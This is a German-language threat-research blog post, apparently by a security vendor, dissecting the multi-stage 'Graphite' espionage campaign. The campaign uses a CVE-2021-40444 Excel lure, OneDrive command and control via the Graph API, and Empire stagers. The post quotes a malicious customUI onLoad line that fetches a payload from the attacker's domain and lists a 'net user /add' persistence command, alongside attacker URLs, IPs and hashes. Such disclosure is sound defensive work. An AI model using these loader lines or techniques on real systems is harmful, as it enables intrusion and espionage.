An einer Produktführung teilnehmen Demo anfordern Bewertung der Cyber-Sicherheit Kontakt

Kundenberichte

Aktuelle Neuigkeiten zu Cyber-Sicherheitstrends, empfohlenen Vorgehensweisen,
Sicherheitslücken und mehr

Büro des Premierministers kompromittiert: Details zur jüngsten Spionagekampagne

Kurzfassung

Unser Advanced Threat Research-Team hat eine mehrstufige Spionage-Kampagne identifiziert, bei der in Westasien hochrangige Regierungsvertreter für den Bereich nationale Sicherheitsrichtlinien und Personen aus dem Verteidigungssektor ins Visier genommen wurden. Vor der Veröffentlichung dieser detaillierten Erläuterung der Komponenten des Angriffs haben wir die Opfer informiert und ihnen alle nötigen Inhalte zur Verfügung gestellt, um alle bekannten Angriffskomponenten aus ihren Umgebungen entfernen zu können.

Am Anfang der Infektionskette steht die Ausführung eines Excel-Downloaders, der dem Opfer wahrscheinlich per E-Mail gesendet wurde und eine MSHTML-Remote-Code-Ausführungsschwachstelle (CVE-2021-40444) ausnutzt, um eine böswillige ausführbare Datei im Arbeitsspeicher auszuführen. Anschließend kam bei dem Angriff eine Malware namens Graphite zum Einsatz, die die Microsoft Graph-API nutzt, um OneDrive als Befehls- und Steuerungs-Server zu verwenden. Diese Technik hatte unser Team zuvor noch nie beobachtet. Zudem war der Angriff in mehrere Stufen aufgeteilt, um möglichst unauffällig zu bleiben.

Die Befehls- und Steuerungsfunktionen nutzten einen Empire-Server, der im Juli 2021 vorbereitet worden war. Die Kampagne selbst war von Oktober bis November 2021 aktiv. Im nachfolgenden Blog-Beitrag werden die inneren Mechanismen, Viktimologie, Infrastruktur und der Verlauf des Angriffs erläutert. Natürlich sind auch Informationen zu den Kompromittierungsindikatoren und MITRE ATT&CK-Techniken enthalten.

Verschiedene Angriffsindikatoren und scheinbare geopolitische Ziele ähneln denen des zuvor aufgedeckten Bedrohungsakteurs APT28. Wir glauben zwar nicht, dass eine Kampagne rein anhand solcher Anzeichen zugeordnet werden kann, sind uns aber relativ sicher, dass unsere Annahme richtig ist. In Anbetracht der genutzten Infrastruktur, der Malware-Codierung und des Vorgehens sind wir jedoch überzeugt, dass wir es mit einem sehr geschickten Bedrohungsakteur zu tun haben.

Trellix-Kunden sind durch die verschiedenen McAfee Enterprise- und FireEye-Produkte geschützt, denen diese Indikatoren bereitgestellt wurden.

Analyse des Angriffsprozesses

Dieser Abschnitt enthält eine Analyse des allgemeinen Angriffsprozesses. Der Angriff beginnt mit der Ausführung einer Excel-Datei, die einen Exploit für die MSHTML-Remote-Code-Ausführungsschwachstelle (CVE-2021-40444) enthält. Dies dient der Ausführung einer böswilligen DLL-Datei, die als Downloader für die Malware der dritten Stufe namens Graphite fungiert. Graphite ist eine vor Kurzem erst entdeckte Malware-Variante, die sich auf einen OneDrive Empire-Stager stützt und OneDrive-Konten über die Microsoft Graph-API als Befehls- und Steuerungs-Server nutzt.

Die letzten Phasen dieses mehrstufigen Angriffs, der unserer Meinung nach mit APT-Aktivitäten zusammenhängt, umfassen die Ausführung verschiedener Empire-Stager, um schlussendlich einen Empire-Agenten auf die Computer der Opfer herunterzuladen und den Befehls- und Steuerungs-Server einzuschalten, damit die Systeme remote gesteuert werden können.

Die folgende Grafik veranschaulicht den allgemeinen Prozess dieses Angriffs.

Abbildung 1. Ablauf des Angriffs
Erste Stufe: Excel-Downloader

Es ist anzunehmen, dass in der ersten Angriffsstufe eine Spearphishing-E-Mail zum Einsatz kommt, mit der die Opfer zum Öffnen einer Excel-Datei mit dem Namen "parliament_rew.xlsx" verleitet werden. Hier die Angaben zur Identifizierung dieser Datei:

Dateityp Excel-Dokument im Microsoft Office Open XML-Format
Dateiname parliament_rew.xlsx
Dateigröße 19,26 KB
Kompilierungszeitpunkt 05/10/2021
MD5 8e2f8c95b1919651fcac7293cb704c1c
SHA-256 f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4

Abbildung 2. Ködertext in der Excel-Datei

Bei der Analyse der Dateistruktur ist uns ein Ordner mit dem Namen "customUI" aufgefallen, der eine Datei namens "customUI.xml" enthielt. Beim Öffnen der Datei mit einem Texteditor haben wir bemerkt, dass das böswillige Dokument die Eigenschaft "CustomUI.OnLoad" des Open XML-Formats nutzt, um eine externe Datei von einem Remote-Server zu laden:

<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>

Diese Technik ermöglicht es den Angreifern, einige Viren-Scan-Module und Office-Analysetools zu umgehen, sodass das Dokument mit geringerer Wahrscheinlichkeit entdeckt wird.

Die heruntergeladene Datei ist wieder ein Excel-Arbeitsblatt, das dieses Mal aber unter Verwendung des alten Microsoft Office Excel 97-2003-Binärdateiformats (.xls) gespeichert wird. Hier die Angaben zur Identifizierung dieser Datei:

Dateityp Microsoft Office Excel 97-2003-Binärdateiformat
Dateiname parliament_rew.xls
Dateigröße 20,00 KB
Kompilierungszeitpunkt 05/10/2021
MD5 abd182f7f7b36e9a1ea9ac210d1899df
SHA-256 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a

Bei Analyse der Metadatenobjekte konnten wir feststellen, dass der Ersteller die in westeuropäischen Ländern genutzte Codepage 1252 verwendet hatte und dass die Datei am 05. Oktober 2021 erstellt worden war.

Abbildung 3. Dokument-Metadaten

Später analysierten wir die OLE-Objekte im Dokument und bemerkten eine OLEStream-Struktur für verknüpfte Objekte, die einen Link zum Exploit für die Schwachstelle CVE-2021-40444 enthielt, welcher auf dem Server des Angreifers gehostet war. Damit ist das Dokument imstande, die HTML-Datei automatisch herunterzuladen und dann das Internet Explorer-Modul zum Interpretieren aufzurufen, wodurch die Ausführung des Exploits angestoßen wird.

Abbildung 4. Remote-Link in OLE-Objekt

In diesem Blog-Beitrag gehen wir nicht auf den Aufbau der Schwachstelle CVE-2021-40444 ein, da diese bereits öffentlich erläutert und besprochen wurde. Stattdessen machen wir mit der Analyse der DLL der zweiten Stufe weiter, die in der CAB-Datei des Exploits enthalten ist.

Zweite Stufe: DLL-Downloader

Die zweite Stufe ist eine ausführbare DLL-Datei namens "fontsubc.dll", die aus der CAB-Datei des zuvor genannten Exploits extrahiert wurde. Hier die Angaben zur Identifizierung dieser Datei:

Dateityp Ausführbare PE32-Datei für Microsoft Windows (DLL) (Konsole) Intel 80386 32-Bit
Dateiname fontsubc.dll
Dateigröße 88,50 KB
Kompilierungszeitpunkt 28/09/2021
MD5 81de02d6e6fca8e16f2914ebd2176b78
SHA-256 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

Diese Datei exportiert eine Funktion namens "CPlApplet", die von Windows als Systemsteuerungsanwendung eingestuft wird. Sie fungiert in erster Linie als Downloader für die Malware der nächsten Stufe, die hier abgelegt ist: hxxps://wordkeyvpload[.]net/keys/update[.]dat. Verwendet werden dafür COM-Objekte und die API "URLOpenBlockingStreamW".

Abbildung 5. Download der Malware der nächsten Stufe

Nach dem Download der Datei entschlüsselt die Malware sie mit einem eingebetteten öffentlichen RSA-Schlüssel und prüft ihre Integrität durch Berechnung eines SHA-256 der entschlüsselten Schaddaten. Schließlich weist die Malware virtuellen Speicher zu, kopiert die Schaddaten in den Speicher und führt diese dann aus.

Abbildung 6. Entschlüsselung und Ausführung der Schaddaten

Vor dem Ausführen der heruntergeladenen Schaddaten vergleicht die Malware die ersten vier Byte mit der magischen Zahl DE 47 AC 45 als hexadezimale Repräsentation. Im Falle einer Abweichung werden die Schaddaten nicht ausgeführt.

Abbildung 7. Magische Zahl der Malware

Dritte Stufe: Graphite-Malware

Die dritte Stufe ist eine ausführbare DLL-Datei namens "dfsvc.dll", die niemals auf die Festplatte geschrieben wird und die wir aus dem Speicher der vorherigen Stufe auslesen konnten. Hier die Angaben zur Identifizierung dieser Datei:

Dateityp Ausführbare PE32-Datei für Microsoft Windows (DLL) (Konsole) Intel 80386 32-Bit
Dateiname dfsvc.dll
Dateigröße 24,00 KB
Kompilierungszeitpunkt 20/09/2021
MD5 0ff09c344fc672880fdb03d429c7bda4
SHA-256 f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

Wir haben diese Malware "Graphite" genannt, weil sie die Microsoft Graph-API nutzt, um OneDrive für Befehls- und Steuerungsaktivitäten zu verwenden. Aufgrund der Ähnlichkeit in Sachen Funktionalität und der Dateistruktur im OneDrive-Konto der Bedrohungsakteure ist es sehr wahrscheinlich, dass die Entwickler von Graphite den Empire OneDrive-Stager als Referenz verwendet haben.

Abbildung 8. API-Anfragen Empire OneDrive-Stager

Graphite erstellt zunächst einen Mutex mit dem hartkodierten Namen "250gHJAWUI289382s3h3Uasuh289di" zum Vermeiden doppelter Ausführungen, Entschlüsseln der Zeichenfolgen und dynamischen Auflösen der APIs, die später verwendet werden. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Cryptography\MachineGuid”.

Abbildung 9. Graphite-Initialisierungen

Als Nächstes erstellt die Malware einen Thread zum Überwachen der Aufgabenausführung und Hochladen der Ergebnisse in das OneDrive-Konto. Die Ergebnisdateien werden in den Ordner "update" des OneDrive-Kontos der Angreifer geladen.

Abbildung 10. Thread zum Überwachen der Aufgabenergebnisse

Danach wechselt die Malware in eine Endlosschleife, in der alle 20 Minuten ein neues OAuth2-Token zur Verwendung bei Microsoft Graph-API-Anfragen abgerufen und ermittelt wird, ob neue auszuführende Aufgaben im Ordner "check" des OneDrive-Kontos der Angreifer vorhanden sind.

Abbildung 11. Anforderung eines neuen OAuth2-Tokens

Nachdem ein neues OAuth2-Token abgerufen wurde, werden Ausspähungsdaten mit den folgenden Informationen von den Systemen der Opfer gesammelt:

  • Laufende Prozesse
  • .NET-CLR-Version von PowerShell
  • Windows-Betriebssystemversion

Die Daten werden mit dem LZNT1-Algorithmus komprimiert und mit einem hartkodierten AES-256-CBC-Schlüssel mit zufälligem Initialisierungsvektor verschlüsselt. Die Arbeitsprozesse werden auf die gleiche Weise verschlüsselt. Abschließend wird die Datei mit den Systeminformationen mit einem zufälligen Namen in den Ordner "BOT_ID}/update" in OneDrive geladen.

Abbildung 12. Graphite-Datenverschlüsselung

Außerdem fragt Graphite durch Enumeration der untergeordneten Dateien im "check"-Unterverzeichnis neue Befehle ab. Wenn eine neue Datei gefunden wird, wird die Microsoft Graph-API zum Herunterladen der Dateiinhalte und anschließenden Entschlüsseln verwendet. Die entschlüsselten Aufgaben haben zwei Felder. Das erste ist die eindeutige Kennung der Aufgabe und im zweiten ist der auszuführende Befehl angegeben.

Mit dem Befehlswert "1" wird die Malware angewiesen, die Systeminformationen wieder an den Befehls- und Steuerungsserver zu senden – also das OneDrive-Konto der Angreifer. Der Befehlswert "2" gibt an, dass es sich bei der entschlüsselten Aufgabe um einen Shellcode handelt. Die Malware erstellt dann einen Thread zum Ausführen.

Abbildung 13. Graphite-Befehle

Wenn die erhaltene Aufgabe ein Shellcode ist, wird das dritte Feld mit der magischen Zahl DE 47 AC 45 als hexadezimale Repräsentation überprüft. Im Falle einer Abweichung werden die Schaddaten nicht ausgeführt. Die restlichen Byte der Aufgabe sind der Shellcode, der ausgeführt wird. Schließlich werden die Aufgabendateien nach der Verarbeitung aus OneDrive gelöscht.

Abbildung 14. Entschlüsselter Arbeitsprozess

Im nachfolgenden Diagramm wird der Ablauf der Graphite-Malware veranschaulicht.

Abbildung 15. Graphite-Ausführungsdiagramm

Vierte Stufe: Empire DLL Launcher-Stager

Die vierte Stufe ist eine dynamische Bibliotheksdatei namens "csiresources.dll", die wir aus einer Aufgabe der vorherigen Stufe auslesen konnten. Die Datei war in eine Graphite-Shellcode-Aufgabe eingebettet, die für das Reflective Loading der ausführbaren Datei in den Speicher des Prozesses und das anschließende Ausführen verwendet wurde. Hier die Angaben zur Identifizierung dieser Datei:

Dateityp Ausführbare PE32-Datei für Microsoft Windows (DLL) (Konsole) Intel 80386 32-Bit
Dateiname csiresources.dll
Dateigröße 111,00 KB
Kompilierungszeitpunkt 21/09/2021
MD5 138122869fb47e3c1a0dfe66d4736f9b
SHA-256 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

Die Variante ist ein generierter Empire DLL Launcher-Stager, der die .NET-CLR-Laufzeit initialisiert und in einem nicht verwalteten Prozess startet, um einen Download-Cradle für das Staging eines Empire-Agenten auszuführen. Damit ist es möglich, den Empire-Agenten in einem Prozess auszuführen, bei dem es sich nicht um PowerShell.exe handelt.

Zuerst überprüft die Malware, ob die Malware mit dem explorer.exe-Prozess ausgeführt wird. Wenn dem nicht so ist, beendet die Malware den Vorgang.

Abbildung 16. Prozessnamensprüfung

Als Nächstes versucht die Malware, die Datei "EhStorShell.dll" im Ordner "System32" zu finden und zu laden. Damit stellt die Malware sicher, dass die ursprüngliche "EhStorShell.dll"-Datei in den explorer.exe-Kontext geladen wird.

Abbildung 17. Laden der EhStorShell.dll-Bibliothek

Der vorherige Vorgang ist wichtig, weil die nächstfolgende Malware die CLSID "{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}" überschreibt, um mithilfe einer COM-Übernahmetechnik Persistenz im System des Opfers zu erreichen. Die zuvor genannte CLSID entspricht dem Prozess "Enhanced Storage Shell Extension DLL" und wird von der Datei "EhStorShell.dll" verwaltet.

Anschließend lädt, initialisiert und startet die Malware die .NET-CLR-Laufzeit. Außerdem kümmert sie sich um die XOR-Entschlüsselung der .NET-Schaddaten der nächsten Stufe und lädt sie in den Speicher. Zuletzt führt sie die Datei mit der .NET-Laufzeit aus.

Abbildung 18. Entschlüsselung der Malware der nächsten Stufe

Fünfte Stufe: Empire PowerShell C#-Stager

Die fünfte Stufe ist eine ausführbare .NET-Datei namens Service.exe, die in der vorherigen Stufe eingebettet und verschlüsselt war. Hier die Angaben zur Identifizierung dieser Datei:

Dateityp Ausführbare PE32-Datei für Microsoft Windows (Konsole) Intel 80386 32-Bit
Dateigröße 34,00 KB
MD5 3b27fe7b346e3dabd08e618c9674e007
SHA-256 d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

Diese Variante ist ein Empire PowerShell C#-Stager, der hauptsächlich darauf abzielt, eine Instanz eines PowerShell-Objekts zu erstellen, das eingebettete PowerShell-Skript mit XOR-Operationen zu entschlüsseln und es mit Base64 zu dekodieren, bevor die Schaddaten schlussendlich mit der Invoke-Funktion ausgeführt werden.

Abbildung 19. Code der fünften Stufe

Der Grund für die Verwendung einer ausführbaren .NET-Datei zum Laden und Ausführen von PowerShell-Code besteht darin, Sicherheitsmaßnahmen wie AMSL zu umgehen, sodass die Ausführung mit einem Prozess ermöglicht wird, der dies eigentlich nicht erlauben sollte.

Sechste Stufe: Empire HTTP PowerShell-Stager

Die letzte Stufe ist ein PowerShell-Skript, genauer gesagt ein Empire HTTP-Stager, der in der vorherigen Stufe eingebettet und verschlüsselt war. Hier die Angaben zur Identifizierung dieser Datei:

Dateityp PowerShell-Skript
Dateigröße 6,00 KB
MD5 a81fab5cf0c2a1c66e50184c38283e0e
SHA-256 da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

Wie zuvor erwähnt, ist dies die letzte Stufe des mehrstufigen Angriffs. Es handelt sich um einen stark verschleierten HTTP-Stager, bei dem das Invoke-Obfuscation-Skript von Empire verwendet wird, um die Analyse zu erschweren.

Abbildung 20. Verschleiertes PowerShell-Skript

Die Hauptfunktion des Skripts besteht darin, hxxp://wordkeyvpload[.]org/index[.]jsp zu kontaktieren, um die ursprünglichen Informationen zum System zu senden, und eine Verbindung zur URL hxxp://wordkeyvpload[.]org/index[.]php herzustellen, damit der verschlüsselte Empire-Agent heruntergeladen, mit AES-256 entschlüsselt und ausgeführt werden kann.

Verlauf der Ereignisse

Basierend auf allen beobachteten und analysierten Aktivitäten haben wir den folgenden Ereignisverlauf zusammengestellt:

Abbildung 21. Verlauf der Kampagne

Ziele

Eines der zuvor genannten Köderdokumente (namens "parliament_rew.xlsx") war möglicherweise darauf ausgerichtet, Behördenmitarbeiter ins Visier zu nehmen.

Neben Regierungsbehörden scheint dieser Angreifer es auch auf den Verteidigungssektor abgesehen zu haben. Ein anderes Dokument mit dem Namen "Missions Budget.xlsx" enthielt den Text "Military and civilian missions and operations" (Militärische und zivile Missionen und Einsätze) sowie Budgetangaben in US-Dollar für Militäreinsätze in manchen Ländern für die Jahre 2022 und 2023.

Abbildung 22. Köderdokument für den Verteidigungssektor

Unsere Telemetriedaten haben außerdem gezeigt, dass Polen und andere osteuropäische Länder für die Bedrohungsakteure hinter dieser Kampagne von Interesse waren.

Die vollständige Viktimologie der Bedrohungsakteure ist unbekannt, doch die beobachteten Köderdokumente deuten darauf hin, dass bei ihren Aktivitäten bestimmte Regionen und Branchen im Fokus stehen. Basierend auf den Namen, den Inhalten der böswilligen Excel-Dateien und unseren Telemetriedaten scheinen die Bedrohungsakteure auf Länder in Osteuropa abzuzielen und die vorherrschenden Branchen sind der Verteidigungssektor und Behörden.

Infrastruktur

Durch Analyse der kompletten Angriffskette wurden zwei Hosts mit Verbindung zum Angriff identifiziert. Die erste Domäne ist wordkeyvpload.net, die in die IP-Adresse 131.153.96.114 aufgelöst wird. Diese befindet sich in Serbien und wurde am 7. Juli 2021 bei OwnRegistrar Inc. registriert.

Bei Abfrage der IP-Adresse mit einem Reverse-DNS-Lookup-Tool wurde ein PTR-Datensatz ausgegeben, der eine Übersetzung in die Domäne "bwh7196.bitcoinwebhosting.net" ergab. Das könnte darauf hindeuten, dass der Server vom VPS-Reseller Bitcoin Web Hosting gekauft wurde.

Abbildung 23. Reverse-DNS-Abfrage

Die Hauptfunktion dieses Befehls- und Steuerungs-Servers ist das Hosten des HTML-Exploits für CVE-2021-40444 und der CAB-Datei mit der DLL der zweiten Stufe.

Die zweite identifizierte Domäne ist wordkeyvpload.org, die in die IP-Adresse 185.117.88.19 aufgelöst wird. Diese befindet sich in Schweden und wurde am 18. Juni 2021 bei Namecheap Inc. registriert. Ausgehend vom Betriebssystem (Microsoft Windows Server 2008 R2), HTTP-Server (Microsoft-IIS/7.5) und von den offenen Ports (1337 und 5000) ist es sehr wahrscheinlich, dass der Host die neueste Version des Post-Exploitation-Frameworks Empire ausführt.

Der Grund für diese Annahme ist, dass die Standardkonfiguration von Empire-Servern Port 1337 für das Hosten einer RESTful-API nutzt und Port 5000 eine SocketIO-Schnittstelle für die Remote-Interaktion mit dem Server hostet. Außerdem wird bei Bereitstellung eines HTTP-Listeners der Standardwert für das HTTP-Server-Feld auf "Microsoft-IIS/7.5" hartkodiert.

Abbildung 24. Lokale Empire-Server-Ausführung mit Standardkonfiguration

Basierend auf den zuvor genannten Informationen sowie der Auslesung der Befehle und Steuerung aus der letzten Malware-Stufe können wir bestätigen, dass dieser Host als Empire-Server fungiert, der zum Remote-Steuern der Agenten auf den Geräten der Opfer und Senden von Befehlen zur Ausführung verwendet wird.

Verantwortung

Im Zeitraum dieser Aktivitäten hat es politische Spannungen an der Grenze zwischen Armenien und Aserbaidschan gegeben. Aus klassischer Informationsbeschaffungsperspektive würde es also durchaus Sinn machen, Systeme zu infiltrieren und Informationen zu sammeln, um die Risiken und das Vorgehen der involvierten Parteien zu beurteilen.

Während unserer Untersuchung der Graphite-Kampagne haben wir sämtliche Zeitstempel von Aktivitäten der Angreifer aus unseren Telemetriedaten ausgelesen und zwei gleichbleibende Trends festgestellt. Erstens führt der Bedrohungsakteur seine Aktivitäten von Montag bis Freitag aus, wie unten abgebildet.

Abbildung 25. Arbeitstage des Bedrohungsakteurs

Zweitens entsprechen die Aktivitätszeitstempel den normalen Geschäftszeiten (8 bis 18 Uhr) in der Zeitzone GMT+3, zu der die Moskauer Zeit, Türkische Zeit, Arabische Normalzeit und die Ostafrikanische Zeit gehört.

Abbildung 26. Arbeitszeiten des Bedrohungsakteurs

Ein weiterer interessanter Fund bei der Untersuchung war, dass die Angreifer die CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) für Persistenz nutzten, was zu einem ESET-Bericht passte, in dem Forscher russische Akteure erwähnten, die es auf osteuropäische Länder abgesehen hatten.

Bei Analyse und Vergleich der Code-Blöcke und Sequenzen der Graphite-Malware mit unserer Varianten-Datenbank haben wir Überschneidungen mit Varianten aus 2018 festgestellt, die APT28 zugeschrieben wurden. Wir haben beispielsweise unsere Varianten hiermit verglichen: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):

Abbildung 27. Code-Vergleich zwischen Varianten

Bei genauerer Betrachtung einiger Funktionen sehen wir Ähnlichkeiten zwischen der Graphite-Variante (links im folgenden Bild) und der genannten Variante aus dem Jahr 2018 (rechts im Bild). Nach fast drei Jahren ist es einleuchtend, dass der Code sich geändert hat, es sieht aber dennoch so aus, als wäre der Programmierer mit einigen der früheren Funktionen zufrieden gewesen:

Abbildung 28. Ähnlicher Funktionsablauf

Auch wenn wir einige Taktiken, Techniken und Prozeduren (TTPs) der Akteure hinter dieser Kampagne genannt haben, fehlt es an Kontext, Ähnlichkeiten oder Überschneidungen, um mit einem gewissen Maß an Sicherheit Rückschlüsse auf APT28 zuzulassen – ganz zu schweigen von einem staatlichen Unterstützer. In Anbetracht der genutzten Infrastruktur, der Malware-Codierung und des Vorgehens glauben wir jedoch, dass wir es mit einem geschickten Bedrohungsakteur zu tun haben.

Fazit

Durch Analyse der in diesem Blog-Beitrag beschriebenen Kampagne konnten wir Einblicke in einen mehrstufigen Angriff von Anfang Oktober gewinnen, bei dem die MSHTML-Remote-Code-Ausführungsschwachstelle (CVE-2021-40444) ausgenutzt und auf Länder in Osteuropa abgezielt wurde.

Wie die Analyse der Graphite-Malware gezeigt hat, kommt eine ziemlich innovative Funktionalität zum Einsatz, nämlich die Verwendung des OneDrive-Diensts für Befehls- und Steuerungsaktivitäten durch Abfragen der Microsoft Graph-API mit einem hartkodierten Token in der Malware. Durch diese Art von Kommunikation bleibt die Malware in den Systemen der Opfer unentdeckt, da sie sich nur mit legitimen Microsoft-Domänen verbindet und kein verdächtiger Netzwerkverkehr erkennbar ist.

Durch die Analyse des gesamten Angriffsprozesses konnten wir neue Infrastruktur ermitteln, die die Akteure für Befehls- und Steuerungsaktivitäten verwendeten, sowie die finalen Schaddaten: ein Agent des Post-Exploitation-Frameworks Empire. Mit allem oben Genannten konnten wir einen Verlauf der in der Kampagne beobachteten Aktivitäten zusammenstellen.

Die Akteure hinter dem Angriff scheinen in Anbetracht ihrer Ziele, Malware und der genutzten Infrastruktur deutlich fortgeschritten zu sein, daher nehmen wir an, dass diese Kampagne primär der Spionage dient. Wir vermuten, dass diese Aktivitäten auf APT28 zurückzuführen sein könnten. Für weitere Untersuchungen haben wir einige Taktiken, Techniken und Prozeduren (TTPs) sowie Indikatoren zu Infrastruktur, Zielen und Funktionen bereitgestellt, anhand derer diese Kampagne erkannt werden kann.

MITRE ATT&CK-Techniken

Taktik
Resource Development T1583.001 Acquire Infrastructure: Domains Die Angreifer kauften Domänen für Befehls- und Steuerungsaktivitäten. wordkeyvpload[.]net
wordkeyvpload[.]org
Resource Development T1587.001 Develop capabilities: Malware Die Angreifer entwickelten böswillige Komponenten zum Ausführen ihres Angriffs. Graphite-Malware
Resource Development T1588.002 Develop capabilities: Tool Die Angreifer nutzten Red-Teaming-Tools zum Ausführen ihres Angriffs. Empire
Initial Access T1566.001 Phishing: Spear phishing Attachment Die Bedrohungsakteure sendeten Spearphishing-E-Mails mit böswilligem Anhang, um sich Zugang zu den Systemen der Opfer zu verschaffen. BM-D(2021)0247.xlsx
Execution T1203 Exploitation for Client Execution Die Bedrohungsakteure nutzten eine Schwachstelle in Microsoft Office aus, um Code auszuführen. CVE-2021-40444
Execution T1059.001 Command and Scripting Interpreter: PowerShell Die Bedrohungsakteure missbrauchten PowerShell zum Ausführen des Empire-Stagers. Empire PowerShell-Stager
Persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking Die Angreifer erreichten Persistenz durch Ausführung böswilliger Inhalte, ausgelöst durch gekaperte Verweise auf COM-Objekte (Component Object Model). CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D
Persistence T1136.001 Create Account: Local Account Die Bedrohungsakteure erstellten ein lokales Konto, um weiter Zugang zu den Systemen der Opfer zu haben. net user /add user1
Defense Evasion T1620 Reflective Code Loading Die Bedrohungsakteure luden mittels Reflective Loading Code in einen Prozess, um die Ausführung böswilliger Schaddaten zu verschleiern. Empire DLL Launcher-Stager
Command and Control T1104 Multi-Stage Channels Die Bedrohungsakteure erstellten mehrere Stufen zum Verschleiern des Befehls- und Steuerungskanals und zum Erschweren der Erkennung. Verwendung unterschiedlicher Empire-Stager
Command and Control T1102.002 Web Service: Bidirectional Communication Die Bedrohungsakteure verwendeten einen bestehenden, legitimen externen Web-Dienst zum Senden von Befehlen an ein kompromittiertes System und Empfangen von Ausgaben dieses Systems über den Web-Dienstkanal. Microsoft OneDrive
Empire-Server
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography Die Bedrohungsakteure nutzten einen bekannten symmetrischen Verschlüsselungsalgorithmus zum Verschleiern des Befehls- und Steuerungsdatenverkehrs, anstatt sich auf den inhärenten Schutz eines Kommunikationsprotokolls zu verlassen. AES 256
Command and Control T1573.002 Encrypted Channel: Asymmetric Cryptography Die Bedrohungsakteure nutzten einen bekannten asymmetrischen Verschlüsselungsalgorithmus zum Verschleiern des Befehls- und Steuerungsdatenverkehrs, anstatt sich auf den inhärenten Schutz eines Kommunikationsprotokolls zu verlassen. RSA

Kompromittierungsindikatoren:

Erste Stufe: Excel-Downloader
40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa
f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4
7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a
9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0

Zweite Stufe: Downloader-DLL
1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

Dritte Stufe: Graphite
35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f
f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

Vierte Stufe: DLL Launcher-Stager
25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

Fünfte Stufe: PowerShell C#-Stager
d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

Sechste Stufe: Empire HTTP PowerShell-Stager
da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

URLs
hxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls
hxxps://wordkeyvpload[.]net/keys/parliament_rew.xls
hxxps://wordkeyvpload[.]net/keys/Missions Budget.xls
hxxps://wordkeyvpload[.]net/keys/TR_comparison.xls

hxxps://wordkeyvpload[.]net/keys/JjnJq3.html
hxxps://wordkeyvpload[.]net/keys/iz7hfD.html
hxxps://wordkeyvpload[.]net/keys/Ari2Rc.html
hxxps://wordkeyvpload[.]net/keys/OD4cNq.html

hxxps://wordkeyvpload[.]net/keys/0YOL4.cab
hxxps://wordkeyvpload[.]net/keys/whmel.cab
hxxps://wordkeyvpload[.]net/keys/UdOpQ.cab
hxxps://wordkeyvpload[.]net/keys/D9V5E.cab

hxxps://wordkeyvpload[.]net/keys/update.dat

hxxps://wordkeyvpload[.]org/index.jsp
hxxps://wordkeyvpload[.]org/index.php
hxxps://wordkeyvpload[.]org/news.php
hxxps://wordkeyvpload[.]org/admin/get.php
hxxps://wordkeyvpload[.]org/login/process.php

Domänen
wordkeyvpload[.]net
wordkeyvpload[.]org
jimbeam[.]live

IP-Adressen
131.153.96[.]114
185.117.88[.]19
94.140.112[.]178

Neuigkeiten erfahren

Wir kennen uns mit Cyber-Sicherheit aus. Nur unser Unternehmen ist neu.
Bleiben Sie auf dem Laufenden dazu, wie wir uns entwickeln.

Geben Sie eine gültige E-Mail-Adresse ein.
Keinerlei Spam, Abmeldung jederzeit möglich.